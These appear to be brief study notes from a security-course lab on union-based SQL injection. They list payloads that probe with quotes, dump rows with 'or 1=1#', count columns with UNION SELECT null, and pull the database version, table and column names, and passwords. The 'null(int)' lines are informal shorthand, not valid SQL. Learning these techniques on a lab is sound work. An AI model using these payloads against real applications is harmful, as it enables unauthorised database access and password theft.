- Try to trigger an error using quotes
jeremy #returns result
jeremy' #try to get an error
jeremy" #try to get an error- Logical operators:
jeremy' or 1=1#
jeremy' or 1=1-- - #this is the same as the one aboveThese dump the table. Why? You gave it a true statement
dashes or # makes everything after them get ignored (like commenting them out)
If you do:
jeremy' or 1=2#you only get jeremy back since it was the only true statement
ONE CONSTRAINT:
When you UNION SELECT, you can only select the same number of columns as the original query.
how to figure out how many are in the original query?
jeremy' union select null#no users found
jeremy' union select null,null#no users found
jeremy' union select null,null,null#You get a result. This means 3 columns being selected.
Wanna know what version?
jeremy' union select null,null,version()#Wanna know what tables exist?
jeremy' union select null,null,table_name from information_schema.tables#Column names?
jeremy' union select null,null,column_name from information_schema.columns#print passwords from table:
jeremy' union select null,null,password from injection0x01#note: injection0x01 is probably going to be “users” in an actual DB
Potential error:
if the first null is an int, it could give you an error when you try to print a string
jeremy' union select null(int),null,null from injection0x01#how to fix?
make the one before match:
jeremy' union select null(int),1,null from injection0x01#Great cheat sheet:
SQL injection cheat sheet | Web Security Academy (portswigger.net)
Blind Injection